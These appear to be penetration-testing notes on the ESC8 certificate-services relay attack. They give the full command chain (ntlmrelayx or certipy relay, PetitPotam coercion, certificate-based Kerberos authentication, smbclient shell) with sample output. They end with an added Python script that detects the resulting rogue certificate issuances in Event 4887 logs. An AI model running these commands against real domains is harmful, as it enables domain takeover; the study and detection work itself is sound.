ESC8
1.0 Prerequisites
- Web Enrollment must be active (the CA web endpoint is reachable over HTTP):
http://$dcip/certsrv
- The relayed account needs enrollment rights on the template
- The template must allow Client Authentication (EKU)
- The template must be published and enabled on the CA
2.0 Attack
2.1 Prepare relay
impacket-ntlmrelayx -t http://$dcip/certsrv -smb2support --adcs --template DomainController
python PetitPotam.py $yourIP $IPofMachineToAuthenticate -u $user -p $pass
2.2 certipy-ad
certipy-ad relay -ca '$TARGET-CA' -template 'DomainController' -target http://$dcip
Open a new shell and run PetitPotam again:
python PetitPotam.py $yourIP $IPofMachineToAuthenticate -u $user -p $pass
2.3 Output
[*] Targeting http://$dcip/certsrv/certfnsh.asp (ESC8)
[*] Listening on 0.0.0.0:445
DOMAIN\MACHINENAME$
[*] Requesting certificate for 'DOMAIN\\MACHINENAME$' based on the template 'DomainController'
[*] Got certificate with DNS Host Name 'machinename.domain.local'
[*] Certificate object SID is 'S-1-5-21-3034620238-1248435811-572132488-1002'
[*] Saved certificate and private key to 'machinename.pfx'
[*] Exiting...
2.4 Authentication and Shell
certipy-ad auth -pfx machinename.pfx -username 'MACHINENAME$' -domain 'domain.local'
export KRB5CCNAME=machinename.ccache
impacket-smbclient @domain.local -no-pass -k
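Added detection example (not part of the original notes): the relay above ends with the CA issuing a DomainController-template certificate to an ordinary machine account, which the CA records as Event ID 4887. The script flags such issuances in constructed sample events; the known-DC list, the DC-class template set and the flattened event layout are assumptions.

```python
import re

# Constructed sample Event ID 4887 messages ("Certificate Services approved a
# certificate request and issued a certificate"), flattened to one event per
# line. Field names follow that event's standard layout; every value is made
# up for this example. Request 102 mirrors the page's output: a
# DomainController-template certificate issued to a plain machine account.
SAMPLE_EVENTS = [
    "Request ID: 101 Requester: DOMAIN\\DC01$ Attributes: CertificateTemplate:DomainController Subject: CN=dc01.domain.local",
    "Request ID: 102 Requester: DOMAIN\\MACHINENAME$ Attributes: CertificateTemplate:DomainController Subject: CN=machinename.domain.local",
    "Request ID: 103 Requester: DOMAIN\\alice Attributes: CertificateTemplate:User Subject: CN=alice",
]

# Accounts that legitimately enroll for DC-class templates (assumption:
# maintained from the Domain Controllers OU, sAMAccountName with trailing '$').
KNOWN_DC_ACCOUNTS = {"DC01$", "DC02$"}

# Built-in templates that give the holder a domain controller identity.
DC_TEMPLATES = {"DomainController", "DomainControllerAuthentication", "KerberosAuthentication"}

EVENT_RE = re.compile(
    r"Request ID: (?P<id>\d+) Requester: (?P<requester>\S+) "
    r"Attributes: (?P<attrs>.*?) Subject: (?P<subject>.*)$"
)


def parse_event(line):
    """Return the fields the check needs, or None if the line is not a 4887 event."""
    m = EVENT_RE.match(line)
    if not m:
        return None
    # Attributes are space-separated "key:value" pairs, e.g. CertificateTemplate:X
    attrs = dict(a.split(":", 1) for a in m["attrs"].split() if ":" in a)
    return {
        "id": int(m["id"]),
        "account": m["requester"].split("\\")[-1],  # strip the DOMAIN\ prefix
        "template": attrs.get("CertificateTemplate", ""),
        "subject": m["subject"],
    }


def is_esc8_candidate(ev, known_dcs=KNOWN_DC_ACCOUNTS):
    """A DC-class template issued to an account that is not a known DC."""
    return ev["template"] in DC_TEMPLATES and ev["account"] not in known_dcs


def find_esc8_candidates(lines, known_dcs=KNOWN_DC_ACCOUNTS):
    """Return the request IDs a defender should investigate (and revoke if rogue)."""
    hits = []
    for line in lines:
        ev = parse_event(line)
        if ev and is_esc8_candidate(ev, known_dcs):
            hits.append(ev["id"])
    return hits
```

Run it over exported 4887 events from the CA; any hit should be revoked and the CA's HTTP enrollment endpoint reviewed, since the relay only works while NTLM is accepted there.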